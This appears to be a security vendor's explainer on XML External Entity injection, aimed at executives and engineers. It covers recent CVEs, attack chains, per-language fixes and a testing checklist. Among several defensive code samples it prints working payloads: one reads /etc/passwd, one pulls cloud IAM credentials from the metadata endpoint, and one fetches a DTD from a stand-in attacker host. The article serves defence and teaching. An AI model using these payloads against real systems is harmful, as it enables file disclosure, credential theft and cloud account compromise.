XML External Entities: The Bug That Never Went Away

On November 27, 2025, the Apache Software Foundation disclosed CVE-2025-66516 — a CVSS 10.0 XML External Entity (XXE) vulnerability in Apache Tika, the parsing library that sits inside thousands of enterprise document-processing pipelines. The bug: upload a single malicious PDF to any system that uses Tika to extract text, and the server reads your /etc/passwd, your cloud IAM credentials, or — with a slightly longer chain — executes attacker-controlled code as your application's process. No authentication required. No user interaction required. Proof-of-concept exploits published within days.

Adobe absorbed the same CVE into ColdFusion the following week. Every release of ColdFusion 2025 (Update 5 and earlier) and ColdFusion 2023 (Update 17 and earlier) was vulnerable. Akamai had to disclose a separate XXE in their own CloudTest platform (CVE-2025-49493) earlier in 2025 after an AI scanner found it in production. Palo Alto Networks shipped CVE-2024-5919 — a blind XXE in PAN-OS firewalls that let authenticated attackers exfiltrate arbitrary files from the device protecting your network.

This is not the story of a new attack class. XML External Entity injection was first publicly documented in 2002. It has been in the OWASP Top 10 multiple times. The reason it still defines every year's worst-CVE list is structural: XML parsers, in most languages, ship with dangerous defaults — and the developers writing applications don't know which knobs to turn off until after they get hit.

This article is written for two readers. If you are a founder or CTO whose product processes any file format upstream — uploads, documents, images, integrations, webhooks — the first sections explain what is actually at stake. If you are an engineer, the technical sections cover the modern attack chains, the 2024–2026 CVE landscape, and the per-language fixes that actually hold.

The 60-second version for non-technical leaders

XML is a 1998-era data format. It is also the format hiding inside almost every modern document you process: Office files (.docx, .xlsx, .pptx are zipped XML), SVG images, SAML SSO tokens, RSS feeds, PDF forms and metadata (XFA, XMP), enterprise integration payloads (SOAP, WSDL), even some API request bodies.

The bug class: XML has a feature called "external entities" — placeholders inside the document that point to a file or URL. When a vulnerable XML parser reads a document containing such a placeholder, it dutifully fetches the file or URL and embeds the contents in what the application then treats as user data. An attacker controls the placeholder. The attacker therefore controls what the server reads — files from your disk, URLs from your internal network, cloud metadata that hands over your AWS credentials.

The reason this matters at the executive level:

The attack arrives through normal product use. Your customers upload PDFs, Excel sheets, profile pictures, contract attachments, SAML tokens. Each upload is a chance to hand the server a poisoned XML payload. The user does not know they are sending an exploit. Your application does not know it is processing one.
The blast radius escalates fast. Best case, the attacker reads your application's source code and database connection strings. Worst case (and the chain we see often in real engagements), the XXE escalates to SSRF against your cloud metadata endpoint — which hands the attacker an active IAM role, which hands the attacker your S3 buckets, your RDS database, and your entire AWS account. CVE-2025-66516 explicitly enables this chain.
The 2024–2025 CVE list is dominated by it. Apache Tika (CVSS 10.0), ColdFusion (multiple), Akamai CloudTest, Palo Alto PAN-OS, MetInfo CMS: all within the 2024–2025 window. Each one represents a class of customers who suddenly had an emergency patch on their hands. The bug class is not winding down.
The fix is a single line of code, but the audit is multi-day work. Disabling external entity resolution in any one parser is one configuration call. The problem: a typical mid-sized application uses three to seven different XML parsers across different modules, such as the SAML library, document processor, image library, RSS feed reader, and SOAP client. Fixing one and missing the others leaves you exposed. This is why we keep finding XXE in companies that "patched it last year."
The original Facebook XXE paid $33,500 in 2014. The same researcher had earlier collected $500 from Google for the same bug class. Both companies were running mature security programs. Bug bounty pricing is a useful proxy for real-world severity: XXE was paying premium critical-bug rates a decade ago, and continues to.

Translation: if your product accepts file uploads, processes documents, integrates with SSO, or takes any XML-shaped input — and your last security review did not specifically include the 2024–2026 XXE attack catalog — your filesystem and your cloud credentials are reachable through the same upload form your customers use every day.

Why this bug exists — in one paragraph

XML supports a feature called "external entities" via the Document Type Definition (DTD): declarations like <!ENTITY xxe SYSTEM "file:///etc/passwd">. When a parser that resolves external entities encounters &xxe; in the document, it substitutes in the contents of /etc/passwd. The substitution happens transparently, before the application sees the parsed result. Many XML parsers, across many languages, have historically defaulted to resolving external entities, and some still do. Disabling that behavior requires explicit, parser-specific configuration. Developers who don't know the bug exists do not configure it. The default is wrong, and the language ecosystem has been migrating away from those defaults (slowly, painfully, library by library) for two decades.

Where XML still shows up (and where you have surface)

It is tempting to assume XML is a legacy format. In practice it is alive in some very specific places that almost every modern company touches:

SAML. Enterprise SSO runs on XML. Every SAML implementation has an XML parser. Most of them have been XXE-vulnerable at some point.
Office documents. .docx, .xlsx, .pptx are zipped XML. Any application that processes them parses XML. (Tika sits here.)
PDFs with XFA forms. Adobe's XML Forms Architecture is XML inside the PDF. The Apache Tika CVE-2025-66516 bug is exactly this surface.
SVG images. SVGs are XML. Image processing pipelines that accept SVG (avatars, icons, document conversion, OCR) include an XML parser.
Configuration and data interchange in older enterprise environments — TIBCO, IBM MQ, banking systems, ERP integrations.
RSS, Atom, and feed processing. Less common in greenfield, still alive in news, analytics, marketing tools.
WSDL and SOAP. Still in production at most large enterprises and frequently exposed as integration endpoints.
OpenID 1.x. The original Facebook XXE was here.
Browser-side XML APIs. Some XSS-to-XXE chains exist through XMLHttpRequest and DOMParser in older configurations.

If your application processes any of these, XXE is a question worth asking — and re-asking, each time you add a new parsing library.

Attack 1 — Direct file disclosure

What an attacker does, in plain English: uploads a document containing an XML placeholder pointing at a file on your server. Your application's XML parser reads the file and includes the contents in the parsed object — which is often reflected back to the attacker in an error message, an XML response, or a generated PDF.

Business impact: immediate disclosure of any file the application's user can read. In a typical Linux container, this includes the application's source code, environment variables (which include database credentials, API keys, and JWT secrets), and configuration files. Once an attacker has your environment variables, they have the keys to your kingdom.

Canonical payload:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

Submitted to any XML endpoint, this returns the contents of /etc/passwd in the parsed response. Variants target /proc/self/environ (process environment variables), ~/.aws/credentials (cloud IAM credentials), or application configuration paths.
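To make the mechanics concrete, here is a minimal Python sketch that lists what a document declares without resolving any of it. It uses the standard library's expat bindings; the function name list_entity_declarations and the dictionary keys are our own illustrative choices, not part of any library. It relies on expat skipping external entities when no external-entity handler is installed.

```python
import xml.parsers.expat


def list_entity_declarations(document: bytes) -> list:
    """Return every entity a document declares, without fetching any of them."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        found.append({
            "name": name,
            "parameter": bool(is_parameter),
            "external": system_id is not None,
            "target": system_id,
        })

    parser = xml.parsers.expat.ParserCreate()
    # No ExternalEntityRefHandler is installed, so expat skips external
    # entities instead of loading them.
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(document, True)
    return found


PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

for declaration in list_entity_declarations(PAYLOAD):
    print(declaration)
```

Run against the canonical payload, this reports a single external general entity named xxe whose target is file:///etc/passwd. A vulnerable parser would go on to read that target; this sketch only records it.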

Attack 2 — SSRF and cloud metadata theft via XXE

What an attacker does, in plain English: the same payload, but instead of pointing at a file path, points at a URL — including the cloud metadata service at http://169.254.169.254/. XML parsers happily fetch HTTP URLs in many configurations. The parser obliges, the metadata service hands over the application's IAM credentials, and the attacker is now logged into your AWS account as your application.

Business impact: full cloud account compromise from a single uploaded PDF. This is the chain Apache Tika CVE-2025-66516 enabled. It is the same primitive that drives our coverage in the SSRF + Cloud Metadata article — XXE is one of the most reliable ways to get SSRF in modern stacks.

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&ssrf;</root>
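When triaging a payload like this, it helps to label where an entity target points. The following is a rough sketch using only the Python standard library; the function name and the label strings are hypothetical, and the check covers IP literals only (a hostname that resolves to an internal address would need a DNS lookup, which is deliberately left out).

```python
import ipaddress
from urllib.parse import urlsplit


def classify_entity_target(system_id: str) -> str:
    """Label an entity target by where it points."""
    parts = urlsplit(system_id)
    if parts.scheme in ("", "file"):
        return "local-file"
    host = parts.hostname or ""
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A hostname rather than an IP literal; resolving it is out of scope here.
        return "unresolved-hostname"
    if address.is_link_local:
        # 169.254.0.0/16 is where the cloud metadata service lives.
        return "link-local"
    if address.is_private or address.is_loopback:
        return "internal"
    return "public"


print(classify_entity_target(
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
))
```

The same labels are a reasonable starting point for egress alerting: an application server that parses uploads rarely has a legitimate reason to reach a link-local address.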

Attack 3 — Blind XXE with out-of-band exfiltration

What an attacker does, in plain English: when the application does not reflect the parsed XML back, the attacker tells the parser to fetch an external DTD file from a server the attacker controls. The DTD instructs the parser to read a local file and embed its contents into the URL of a follow-up HTTP or DNS request — to the attacker's server. The attacker reconstructs the file contents from their access logs.

Business impact: exfiltration is possible even from "headless" XML parsers that never return anything to the user. This is the variant that defeats most teams' assumption of "well, our XML endpoint doesn't return XML, so we're safe." It does not need to. The parser's outbound network call is the channel.

The 2024 example: CVE-2024-5919 in Palo Alto Networks PAN-OS. A blind XXE in the management plane let authenticated attackers exfiltrate arbitrary files from the firewall — the device protecting your network — to an attacker-controlled HTTP endpoint. Firewall configurations, admin credentials, VPN keys, the lot.
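Blind XXE depends on the parser accepting a DTD in the first place, so one blunt defense is to refuse any document that carries a DOCTYPE. The sketch below shows the idea with the standard library's expat bindings. DoctypeForbidden and assert_no_doctype are names we made up for illustration, and attacker.example is a placeholder host.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def assert_no_doctype(document: bytes) -> None:
    """Parse the document and fail as soon as a DOCTYPE is seen."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in untrusted input")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    # Exceptions raised inside a handler propagate out of Parse().
    parser.Parse(document, True)


BLIND_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE root SYSTEM "http://attacker.example/evil.dtd">'
    b"<root/>"
)

try:
    assert_no_doctype(BLIND_PAYLOAD)
except DoctypeForbidden as error:
    print("rejected:", error)
```

The handler fires before any entity is declared or referenced, so nothing is fetched and no outbound request is made. Malformed XML still raises expat's own ExpatError, which callers should treat as a rejection too.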

Attack 4 — DoS via billion-laughs and quadratic blowup

What an attacker does, in plain English: sends a tiny XML document (a few kilobytes) that expands into gigabytes of memory through nested entity references. The parser allocates, the process runs out of memory, the service falls over.

Business impact: low-effort denial of service for any service that accepts XML input. A single 3KB request can take down a production process. Most parsers cap entity expansion by default; some do not, and some applications deliberately lift the cap for "convenience," which is exactly the pattern attackers fingerprint.
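The arithmetic behind the blowup is easy to check. The sketch below computes how large an entity becomes after full expansion without ever building the expanded string. The entity table mirrors the classic billion-laughs shape (ten levels, each referencing the previous one ten times); expanded_length is an illustrative helper, not a library function.

```python
import re
from functools import lru_cache

ENTITY_REF = re.compile(r"&(\w+);")


def expanded_length(entities: dict, name: str) -> int:
    """Length of entity `name` after full expansion, computed without expanding it."""

    @lru_cache(maxsize=None)
    def length_of(entity: str) -> int:
        text = entities[entity]
        literal_chars = len(ENTITY_REF.sub("", text))
        nested = sum(length_of(ref) for ref in ENTITY_REF.findall(text))
        return literal_chars + nested

    # Assumes no entity refers to itself; XML forbids recursive references.
    return length_of(name)


# Ten levels: "lol" is three characters, each later level repeats the previous ten times.
entities = {"lol": "lol"}
for level in range(1, 10):
    previous = "lol" if level == 1 else f"lol{level - 1}"
    entities[f"lol{level}"] = f"&{previous};" * 10

print(expanded_length(entities, "lol9"))  # 3000000000
```

Ten entity definitions of a few dozen characters each expand to three billion characters, which is why a parser without an expansion cap runs out of memory.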

The 2024–2026 CVE landscape

CVE-2025-66516 — Apache Tika. CVSS 10.0. Disclosed November 27, 2025. XXE via XFA content in PDFs processed by tika-core 1.13–3.2.1 and tika-pdf-module 2.0.0–3.2.1. No authentication required. Public PoC exploits available. Used by document-processing pipelines across the enterprise.
Adobe ColdFusion follow-on. ColdFusion 2025 (Update 5 and earlier) and ColdFusion 2023 (Update 17 and earlier) absorbed the same Tika dependency. Adobe shipped fixes in ColdFusion 2025 Update 6 and 2023 Update 18. Every ColdFusion customer who patched late was exposed.
CVE-2025-49493 — Akamai CloudTest. XXE in the SOAP endpoint at /concerto/services/RepositoryService. Identified autonomously by XBOW's vulnerability scanner. Affected multiple SOAP endpoints across CloudTest instances. Akamai's own platform — which a number of bug-bounty-running companies operate atop — was vulnerable.
CVE-2024-5919 — Palo Alto Networks PAN-OS. Blind XXE in PAN-OS management plane. Authenticated attackers could exfiltrate arbitrary files from the firewall to attacker-controlled HTTP endpoints.
MetInfo CMS <= 8.1. SSRF via XXE. Allowed attackers to construct malicious XML entities forcing the server to initiate HTTP requests to arbitrary internal or external addresses.

The pattern across this list: document processing (Tika, ColdFusion), SOAP integrations (Akamai), management interfaces (PAN-OS), and web applications (MetInfo). XXE is not concentrated in one niche — it is wherever XML is being parsed without secure defaults.

The fixes — per language

The fix is one line per parser. The audit work is finding all of them.

Python: Use defusedxml instead of the standard library's XML parsers. defusedxml.ElementTree drops in as a replacement for xml.etree.ElementTree and ships secure defaults.
Java: Disable DTDs and external entities on every parser factory instance. The exact incantation differs by parser:
- DocumentBuilderFactory: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
- SAXParserFactory: factory.setFeature("http://xml.org/sax/features/external-general-entities", false); and factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
- XMLInputFactory: factory.setProperty(XMLInputFactory.SUPPORT_DTD, false); and factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
Audit every parser instantiation in the codebase; do not assume "we did it once."
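.NET: Set DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null on XmlReaderSettings. Prefer XDocument over XmlDocument. On modern .NET (5+), defaults are safer, but legacy code paths that target older .NET Framework versions or explicitly assign a resolver still bite.
PHP: On PHP 8.0+ built against libxml2 2.9 or later, external entity loading is off by default and libxml_disable_entity_loader() is deprecated. The remaining risk is code that passes LIBXML_NOENT or LIBXML_DTDLOAD when parsing, so remove those flags for untrusted input; libxml_set_external_entity_loader() can additionally install a callback that refuses every request. On older PHP, call libxml_disable_entity_loader(true) before parsing.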
Node.js: Most XML parsers (xml2js, fast-xml-parser, sax) don't resolve external entities by default. Verify the version and options on every parser you depend on.
Go: The standard encoding/xml doesn't resolve external entities. Watch for third-party parsers that wrap libxml2 — those inherit libxml2's defaults.
Ruby: Nokogiri 1.12.0+ disabled external entity loading by default. On older versions, leave the NOENT parse option off and keep NONET on. On any version, never enable NOENT or DTDLOAD for untrusted input.
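Finding every parser is the slow part, and a first pass can be automated. As a rough sketch for a Python codebase, the helper below walks a source file's syntax tree and reports imports that look like XML parsing. The module list is illustrative and incomplete, xml_imports is a hypothetical name, and the scan only sees direct imports, not parsers pulled in transitively by dependencies.

```python
import ast

# Module prefixes that suggest XML parsing. Illustrative, not exhaustive.
XML_MODULES = ("xml.", "xmlrpc", "lxml", "defusedxml", "xmltodict")


def xml_imports(source: str) -> list:
    """Return (line number, module) pairs for XML-related imports in `source`."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        else:
            continue
        for name in names:
            if name == "xml" or name.startswith(XML_MODULES):
                hits.append((node.lineno, name))
    return sorted(hits)


SAMPLE = """import json
import xml.etree.ElementTree as ET
from lxml import etree
from defusedxml import ElementTree
"""

for line_number, module in xml_imports(SAMPLE):
    print(line_number, module)
```

Every hit that is not defusedxml is a parser instantiation to review by hand. The equivalent search in other languages is a grep for the factory and reader classes named in the list above.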

The boardroom translation table

What your team says	What it means	What it could cost you
"We process Office docs / PDFs / SVG uploads"	You have an XML parser in the upload pipeline. If any parser is unconfigured, you are vulnerable.	File disclosure → environment variable theft → cloud credential theft → full AWS compromise.
"We're on Apache Tika"	CVE-2025-66516 (CVSS 10.0). Upgrade tika-core and tika-pdf-module past 3.2.1 immediately.	Unauthenticated file disclosure and SSRF via a single uploaded PDF, with a potential path to code execution.
"We run ColdFusion"	You need ColdFusion 2025 Update 6 or ColdFusion 2023 Update 18. Earlier updates bundle the vulnerable Tika.	Same as above. Adobe's own framework is in the exposure chain.
"Our XML endpoint doesn't return XML, so we're safe"	Blind XXE with out-of-band exfiltration does not need a response. Palo Alto's CVE-2024-5919 is the proof point.	File exfiltration via DNS or HTTP that your team's monitoring almost certainly does not see.
"We disabled it last year"	You disabled it in one parser. Most apps have three to seven different parsers.	Almost certain finding in any external assessment focused on parsing.

Five questions a non-technical leader should ask the engineering team

"List every XML parser our code uses, including transitively." If your team can produce the list in under an hour, you have parser hygiene. If not, that is the answer — an unmapped parsing surface is an XXE finding waiting to happen.
"Are we on the patched versions of Apache Tika, ColdFusion, and any document-processing library?" The 2025 wave required emergency patching across these. If your team cannot name the patch level, prioritize the audit.
"Do we accept SVG uploads, Office file uploads, or any file format that contains XML internally?" If yes, and the parsing is on the server side, this is a primary attack surface — and most teams do not realize it.
"What happens if our application server makes an outbound HTTP request to 169.254.169.254?" If the answer is "nothing — we don't monitor that," your blind-XXE-to-AWS-credentials chain is invisible to your detection stack.
"When was the last time we tested the upload pipeline for XXE specifically — not just generic security scanning?" Generic scanners often miss it because the exploit lives in document internals. Manual or specialized testing is required.

What we test, every engagement involving file uploads or XML parsing

Direct file disclosure via file:// entities against /etc/passwd, /proc/self/environ, ~/.aws/credentials, and application config paths.
SSRF via http:// entities against the cloud metadata endpoint and internal network ranges.
Blind XXE with out-of-band exfiltration via a controlled DTD and a Burp Collaborator (or equivalent) listener.
XXE inside Office documents (.docx, .xlsx) by modifying the internal XML and re-zipping.
XXE inside SVG uploads via the standard SVG XML wrapper.
XXE inside PDF XFA forms (the CVE-2025-66516 vector).
XXE inside SAML responses on the SSO endpoint (often a separate parser from the main application).
Billion-laughs and quadratic-blowup DoS against XML endpoints.
Parameter entity attacks (<!ENTITY % …>) for parsers that block general entities but still resolve parameter entities.
XInclude attacks against parsers that support <xi:include>.
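The Office-document check in the list above also works in reverse, as an intake filter. A minimal sketch, assuming that well-formed Office parts normally carry no DOCTYPE at all: open the upload as a zip and flag any XML part that declares one. members_with_doctype is a hypothetical helper, and the byte search will miss parts encoded as UTF-16.

```python
import io
import zipfile


def members_with_doctype(archive_bytes: bytes) -> list:
    """Names of XML parts inside a zip container that contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            # A DOCTYPE must precede the root element, so a bounded prefix is enough.
            with archive.open(info) as part:
                head = part.read(64 * 1024)
            if b"<!DOCTYPE" in head:
                flagged.append(info.filename)
    return flagged


# Build a tiny stand-in for a tampered .docx entirely in memory.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("[Content_Types].xml", "<Types/>")
    archive.writestr(
        "word/document.xml",
        '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
    )

print(members_with_doctype(buffer.getvalue()))  # ['word/document.xml']
```

This is a screening step rather than a fix: the parser behind the upload still needs external entities disabled, because a filter like this can be bypassed by encodings or container tricks it does not anticipate.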

If your last assessment did not specifically test against the 2024–2026 catalog — Tika XFA payloads, blind XXE out-of-band exfiltration, SVG/Office variants — your upload pipeline has not been pressure-tested against the current attacker.

Why XXE is a useful canary

When we find XXE in an application, it tells us something specific: this team has not done a security review focused on parsing. Almost always, finding XXE in one place is followed by finding it in two or three more, often through different XML parsers in different modules. The bug class is a marker for systemic parser-handling debt.

For us, that is why XXE is one of the most diagnostic findings in an engagement. A single XXE bug rarely lives alone, and the audit work that surfaces the second and third instances usually surfaces other parsing bugs as well (insecure deserialization, prototype pollution, SSRF via other channels).

The bottom line

XML External Entity injection is a 23-year-old bug class. It is the bug that Apache Tika absorbed at CVSS 10.0 in November 2025. It is the bug that Adobe shipped into ColdFusion the following week. It is the bug Akamai found in their own platform. It is the bug Palo Alto patched in the firewall protecting your network. And it is the bug we still find on engagements that include any meaningful upload pipeline or XML processing path.

The defenses are short, well-documented, and per-language — but they require an audit of every XML parser your application touches, including transitively through libraries. If your team has not done that audit in the last twelve months, this is the cheapest, highest-leverage security project on your roadmap. The cost of doing it this quarter is meaningfully smaller than the cost of being the next CVSS-10.0 case study.